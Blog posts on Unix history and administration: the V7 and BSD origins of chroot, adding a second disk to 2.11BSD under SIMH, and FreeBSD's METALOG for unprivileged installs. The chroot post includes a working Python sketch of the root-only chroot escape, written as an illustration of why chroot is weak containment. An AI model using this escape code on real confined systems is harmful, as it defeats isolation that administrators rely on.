20200627

Whither chroot?

Chroot Origins

This blog post will examine original artifacts to clear up some confusion about where chroot(2) and chroot(8) came from. The answer turns out to be simple, and the confusion was understandable. This shows the benefits of groups like TUHS in preserving Unix history, and how the kindness of Caldera and Lucent in releasing the historic Unix systems has helped in our understanding of the evolution of Unix. 

EDIT: After initial publication, this post was revised with more links to historic artifacts (inline and in the Appendix) and a screenshot of Wikipedia. The Wikipedia chroot entry has since been updated.

tl;dr: chroot(2) came from 7th Edition Unix

chroot is system call 61 in 7th Edition Unix from Bell Labs. There is no chroot system call in 6th Edition or earlier. All derivatives of 7th edition have chroot(2) for at least 2 decades after the 7th Edition release in 1979.

What confusion?

Wikipedia has this in their entry for chroot:
which suggests that Bill Joy had something to do with its creation in the BSD world. Turns out it's confused because earlier literature on the topic is also confused.

What Sparked the Confusion?

Poul-Henning Kamp created the jail system for FreeBSD. This system takes a chroot environment to the next level in terms of security. As a security device, chroot was terrible because it's fairly easy to break out of a chroot if you are root. The short version: open '/' to get a reference to it, then chroot to some directory further down the tree, then fchdir to the fd you saved from '/'. Now chdir("..") a bunch of times; this walks you back to the real root. Finally, chroot(".") and you are out. There are lots of variations on this theme, dozens of papers in the literature, and an almost infinite number of ways to leak references to FDs outside the jail...
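The escape sequence described above can be sketched in a few lines. This is only an illustration, written in Python rather than C for brevity: the function name, its parameters and the loop limit are my own choices, it must be run as root, and some modern kernels take countermeasures that make it fail.

```python
import os


def escape_chroot(subdir, max_depth=1024):
    """Sketch of the root-only chroot escape described in the text.

    `subdir` is any existing directory below the current root.
    The names here are illustrative; root privileges are required.
    """
    root_fd = os.open("/", os.O_RDONLY)  # keep a reference to the current root
    try:
        os.chroot(subdir)                # move the root further down the tree
        os.fchdir(root_fd)               # cwd is now outside the new root
    finally:
        os.close(root_fd)

    # Walk upward until "." and ".." are the same directory: the real root.
    for _ in range(max_depth):
        here, parent = os.stat("."), os.stat("..")
        if (here.st_dev, here.st_ino) == (parent.st_dev, parent.st_ino):
            break
        os.chdir("..")

    os.chroot(".")                       # re-root at the real root
```

The trick works because the kernel only stops ".." at the process's root directory, and after the second chroot the current directory is no longer underneath that root.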

One of the wonderful things he did was to create an extensive set of docs and write a paper about the jail(2) facilities. In this paper Mr. Kamp wrote:
[CHROOT]
Dr. Marshall Kirk Mckusick, private communication: ``According to the SCCS logs, the chroot call was added by Bill Joy on March 18, 1982 approximately 1.5 years before 4.2BSD was released. That was well before we had ftp servers of any sort (ftp did not show up in the source tree until January 1983). My best guess as to its purpose was to allow Bill to chroot into the /4.2BSD build directory and build a system using only the files, include files, etc contained in that tree. That was the only use of chroot that I remember from the early days.''
This paper was presented at the 2nd International System Administration and Networking Conference "SANE 2000" May 22-25, 2000 in Maastricht, The Netherlands and is published in the proceedings.

In 2000, the BSD SCCS tree was not publicly available. Dr. McKusick had access to it through his role with the Computer Systems Research Group (CSRG), which produced the 4BSD releases. This predated various litigation that suggested 32V had no copyright, and the Ancient Unix License that SCO granted for 32V, so it was necessarily private per agreements between AT&T and the University of California at Berkeley.

What Actually Happened in 1982?

What happened was a shuffling of the deck chairs. The commit log, made as root, from March 18, 1982 says:

rearrange for kirk

SCCS-vsn: 4.21
and introduces chroot to ufs_syscalls.c. If you read the diffs, it also introduced 'open', 'creat' and several others to this file. These system calls are known to be in the PDP-7 Unix implementation, so it's unlikely that they were really introduced in this commit. One problem that makes this harder to track is that SCCS didn't track renames, and ufs_syscalls.c was renamed to vfs_syscalls.c in 4.4BSD.  It's quite clearly in ufs_syscalls.c in 4.1cBSD:
/*
 * Change notion of root (``/'') directory.
 */
chroot()
{

        if (suser())
                chdirec(&u.u_rdir);
}
which is the identical code that was added by Bill Joy to ufs_syscalls.c. This was moved between 4.1BSD and 4.1c from sys4.c as part of the UFS work, and differs only by the BSD-stylistic change of adding a blank line before the rest of the code when there are no local variables:
chroot()
{
        if (suser())
                chdirec(&u.u_rdir);
}
which, apart from the comment, is identical. Without beating a dead horse (too late?), this code is the same all the way back to 4BSD, 3BSD, 32V, 2.8BSD and finally to V7:
chroot()
{
        if (suser())
                chdirec(&u.u_rdir);
}
The code is identical from V7 all the way through 4.2BSD, which is when, according to the footnote in the jail paper, it was added. This is direct evidence that the footnote was in error.

So what was the rearrangement for Kirk? It was to move things around in the kernel to make the system calls more generic. It was code motion, nothing more, that Dr. McKusick was reporting in the private email to Mr Kamp. Now that the SCCS tree is public, via a translation to svn by John Baldwin, we can see the above.

chroot(2) Conclusions

Given that the code was moved around a lot, Dr. McKusick's mistake is understandable. Given that the code is identical to the V7 code, and that it was present somewhere in all the extant versions between the two (2BSD, 32V, 3BSD, 4.0BSD, 4.1BSD, 4.1cBSD and 4.2BSD), modulo a trivial whitespace change, we can conclude that Bill Joy did not introduce chroot into 4.2BSD. Instead, the original V7 code was carried forward and moved around a lot.

The FreeBSD chroot(2) manual has been updated to correct this mistake.

But what about chroot(8)?

There's some confusion about this as well. Until recently, the FreeBSD chroot(8) manual said:
HISTORY
     The chroot utility first appeared in 4.4BSD.
However, that too is in error (or at least was not precise enough). The error comes from the 4.4BSD release itself, which has identical text. In a sense this is not wrong: 4.4BSD was the first full release in the Berkeley world that included chroot(8). Its first appearance on any BSD tape, though, was in the interim 4.3BSD-Reno release.

But what about the AT&T world? There, more system calls are wrapped in programs to make them easier to use in shell scripts. It turns out that System III had a usr/src/cmd/chroot.c, which I won't quote here, and it's a different chroot than the one that appeared in BSD (the code looks completely different, apart from the elements that have to be the same...). So, the history has been corrected to read:
HISTORY
     The chroot utility first appeared in AT&T System III UNIX and
     4.3BSD-Reno.
to represent the first time in each of the two branches of Unix after the 7th Edition that it appeared.

And that concludes today's software archeology deep dive on chroot...

Appendix

Here's the evolution of the chroot(2) implementation, as seen from TUHS. You'll need to search for 'chroot()' in each of these source files since the current TUHS web site doesn't allow line number links.
AT&T Unix: V7, 32V, System III, System V

I'd also like to plug the Historic Unix Repo, which also helps navigate and allows line numbers. Here's a link to the 4.1c version, for example. I recalled this after I'd found all the TUHS references, or I'd have done all of them like that.

Adding a second disk with SIMH and 2.11BSD

Adding a Second Disk to a 2.11BSD system under SIMH

I recently followed some instructions to get 2.11BSD running under SIMH. That topic is covered elsewhere adequately. I may write something up in the future.

Before I started, my simh.init file looked like this (some items from install omitted)

SET CPU 11/93, 4M
SET CPU IDLE
SET RP  ENABLE
SET RP0 ENABLE, RP06, WRITEENABLED
ATTACH RP0 ./2.11BSD
SET XQ ENABLED
SET XQ TYPE=DEQNA
SET XQ MAC=08-00-2b-11-07-82
ATTACH XQ tap:tap0
; At the SimH prompt type: unix
BOOT RP0

As part of my 2.11BSD patch level 0 restoration project (more on that later), I needed to add another disk onto which I could install chroot images for test builds. I'm running 2.11BSD pl 457 at the moment (I've not walked forward from the last snapshot tape). Fortunately, this version has disklabels, so I'm able to do this the easy way (though the old hard-coded stuff isn't too hard either).

First, I needed to add the raw disk in simh. I opted to have a second RP06 for simplicity. There's adequate space. My 'root image' for 2.11BSD I want to test is about 100MB, and the RP06 is 165MB. That should be adequate. I just needed to duplicate the RP0 lines:
SET RP1 ENABLE, RP06, WRITEENABLED
ATTACH RP1 ./extra-data
and restart simh (be sure to halt any running system before stopping simh). The important part here is to configure RP1 as writeable and an RP06. Otherwise, it will default to the smaller RP04. For me, that's too small.

Next, I had to check to see if there were /dev nodes for this device. The xp driver handles RP06 (and many other) disks.
3% root-> ls /dev/xp1*
/dev/xp1a  /dev/xp1c  /dev/xp1e  /dev/xp1g
/dev/xp1b  /dev/xp1d  /dev/xp1f  /dev/xp1h
so I'm in luck. The devices are there. Otherwise I'd have to run /dev/MAKEDEV in /dev to add them (or worse, do it by hand).

Next, I needed to label the disk. It's fortunate I'm running a new version because this was easy and I didn't have to rely on the hard-coded partitioning in the driver. However, even if I did, I'm using the whole disk so it wouldn't change my life much...
5% root-> disklabel -r -w xp1 rp06
which puts the standard rp06 label (from /etc/disktab) onto the drive. Chances are good that this will work on older versions. This gives the following label:
6% root-> disklabel -r xp1
# /dev/rxp1a:
type: unknown
disk: rp06
label:
flags: removeable badsect
bytes/sector: 512
sectors/track: 22
tracks/cylinder: 19
sectors/cylinder: 418
cylinders: 815
rpm: 3600
interleave: 1
trackskew: 0
cylinderskew: 0
headswitch: 0           # milliseconds
track-to-track seek: 0  # milliseconds
drivedata: 0

8 partitions:
#        size   offset    fstype   [fsize bsize]
  a:     9614        0   2.11BSD     1024  1024         # (Cyl.    0 - 22)
  b:     8778     9614      swap                        # (Cyl.   23 - 43)
  c:   153406    18392   2.11BSD     1024  1024         # (Cyl.   44 - 410)
  d:   168724   171798   2.11BSD     1024  1024         # (Cyl.  411 - 814*)
  e:   322130    18392   2.11BSD     1024  1024         # (Cyl.   44 - 814*)
  g:   171798        0   2.11BSD     1024  1024         # (Cyl.    0 - 410)
  h:   340522        0   2.11BSD     1024  1024         # (Cyl.    0 - 814*)
Note one difference from modern FreeBSD: rxp1a. 2.11BSD still has the character/block split. Also, the 'standard' layout looks a bit odd to modern eyes. There are four sets of partitions here: a, b, c and d for a system disk with / on a, swap on b and /usr on c; a, b and e for the same thing with a larger /usr on e; g and d to split the disk in half for data storage; and h for the whole disk. This mirrors the partitions from when things were hard coded in the device driver (yikes! glad we don't have that legacy anymore). In those days, you had to be as flexible as you could and leave it to the sysadmin to make wise choices with the limited flexibility they had. These days, I'd label a scratch disk with just one partition (and call it 'a'). Since I was being lazy, I thought I'd leave this label in place. It's a quaint curiosity, but also instructive of history.
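The cylinder ranges in the label's comments follow directly from the geometry, and the overlapping sets of partitions each add up to the whole disk. Here is a small Python sketch that checks this using only the numbers in the label above; the function and variable names are mine, and treating the trailing '*' as "ends partway through a cylinder" is my reading of the output rather than something documented here.

```python
SECTORS_PER_TRACK = 22
TRACKS_PER_CYLINDER = 19
SECTORS_PER_CYLINDER = SECTORS_PER_TRACK * TRACKS_PER_CYLINDER  # 418, as in the label

# (size, offset) in 512-byte sectors, copied from the label above.
PARTITIONS = {
    "a": (9614, 0),
    "b": (8778, 9614),
    "c": (153406, 18392),
    "d": (168724, 171798),
    "e": (322130, 18392),
    "g": (171798, 0),
    "h": (340522, 0),
}


def cylinder_range(size, offset):
    """Return (first cylinder, last cylinder, ends mid-cylinder?)."""
    first = offset // SECTORS_PER_CYLINDER
    last = (offset + size - 1) // SECTORS_PER_CYLINDER
    partial = (offset + size) % SECTORS_PER_CYLINDER != 0
    return first, last, partial


def total(names):
    """Sum the sizes of the named partitions."""
    return sum(PARTITIONS[n][0] for n in names)


for name, (size, offset) in PARTITIONS.items():
    first, last, partial = cylinder_range(size, offset)
    print(f"{name}: cyl {first:3d} - {last}{'*' if partial else ''}")

# Each layout covers the same 340522 sectors as 'h'.
print(total("abcd"), total("abe"), total("gd"), total("h"))
```

The last line prints the same number four times, which is the point: the label describes one disk carved up in several alternative ways, not seven independent regions.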

So, next, I have to put a filesystem on it. That's done with newfs:
8% root--> newfs /dev/xp1h
newfs: /dev/xp1h: not a character device
9% root--> newfs /dev/rxp1h
newfs: /sbin/mkfs -m 2 -n 209 -i 4096 -s 170261 /dev/rxp1h
isize = 42560
m/n = 2 209
which gives me a new filesystem. This is quite a bit less chatty than I'm used to on FreeBSD. Also, even after noticing, I forgot you have to newfs and fsck the raw device, not the block device.
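The numbers newfs hands to mkfs line up with the label if mkfs counts in 1024-byte blocks rather than 512-byte sectors. That unit is an inference from the arithmetic, not something the output states, so treat this Python sketch as a sanity check only:

```python
SECTOR_BYTES = 512
FS_BLOCK_BYTES = 1024          # assumption: mkfs sizes are in 1024-byte blocks

h_sectors = 340522             # size of partition h from the disklabel
sectors_per_cylinder = 418     # from the disklabel

fs_blocks = h_sectors * SECTOR_BYTES // FS_BLOCK_BYTES
blocks_per_cylinder = sectors_per_cylinder * SECTOR_BYTES // FS_BLOCK_BYTES

print(fs_blocks)               # 170261, matching "-s 170261"
print(blocks_per_cylinder)     # 209, matching "-n 209"
```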

Now time to mount it and add it to fstab. Old-school write ups say to fsck /dev/rxp1h here, but given simh doesn't simulate the unreliability often found in the hardware of the time, I've skipped that part.
10% root--> mkdir /scratch
11% root--> mount /dev/xp1h /scratch
12% root--> vi /etc/fstab
"/etc/fstab" 3 lines, 79 characters
/dev/xp0a       /       ufs     rw              1       1
/dev/xp0b       none    swap    sw              0       0
/dev/xp0c       /usr    ufs     rw              1       2
/dev/xp1h       /scratch ufs    rw              1       1
I've scrunched the vi session into the above: I just added the last line. And now I have a /scratch filesystem that will survive reboot.

And now I'm ready to create a tape with my putative 2.11BSD pl 0 system (really at the moment a 2.11BSD pl 195 system with pl0 sources). But that's for another day.

20200618

FreeBSD's METALOG: unprivileged installs

What is METALOG?

When you 'make installworld -DNO_ROOT DESTDIR=blah', the system will create a $DESTDIR/METALOG file. This file contains all the permissions and modes for the files. Normally, installworld requires root permission. -DNO_ROOT instructs the build system to install the files as the current user and to record the intended ownership, permissions, etc. in the METALOG.
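To give a feel for what such a file holds, here is a minimal Python sketch that splits one mtree-style entry into a path and its key=value attributes. The sample line is made up for illustration and is not copied from a real METALOG, and the parser ignores details of the mtree format such as escaped characters.

```python
def parse_metalog_line(line):
    """Split an mtree-style entry into (path, {keyword: value})."""
    path, *fields = line.split()
    attrs = dict(field.split("=", 1) for field in fields)
    return path, attrs


# Hypothetical entry, for illustration only.
sample = "./bin/cat type=file uname=root gname=wheel mode=0555"

path, attrs = parse_metalog_line(sample)
print(path, attrs["uname"], attrs["gname"], oct(int(attrs["mode"], 8)))
```

The file on disk can be owned by whoever ran the install; the ownership and mode that the file should have in the final image live in entries like this one.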

How to use METALOG

Creating a UFS partition with no privs

If you have your own tooling around image creation, you can use the METALOG to supply the permissions and other filesystem metadata to that process. makefs can be used by a non-privileged user to create a UFS partition image. Coupled with mkimg, you can create an entire bootable system image without needing root. Look at the -F flag to makefs(8) for how to use this functionality.

Package Base Use

METALOG is also used by the pkgbase initiative to slice up the system. Part of the metadata that's included is what package each of the installed files belongs to. This is all transparent when you do a 'make packages' to generate these packages.

Tarring up an installworld

If you are looking for a quick and dirty way to update a VM, you can often just create a tarball from the METALOG. Tar was enhanced a number of years ago to understand mtree files. The METALOG is one giant mtree file. To create a tarball that's a copy of the image with all the right permissions:

cd $DESTDIR
tar cfJ base.txz @METALOG
This will create an xz-compressed base.txz similar to what the release images create. This one tarball has everything (unlike the base.txz from the release build process), and is about 800MB.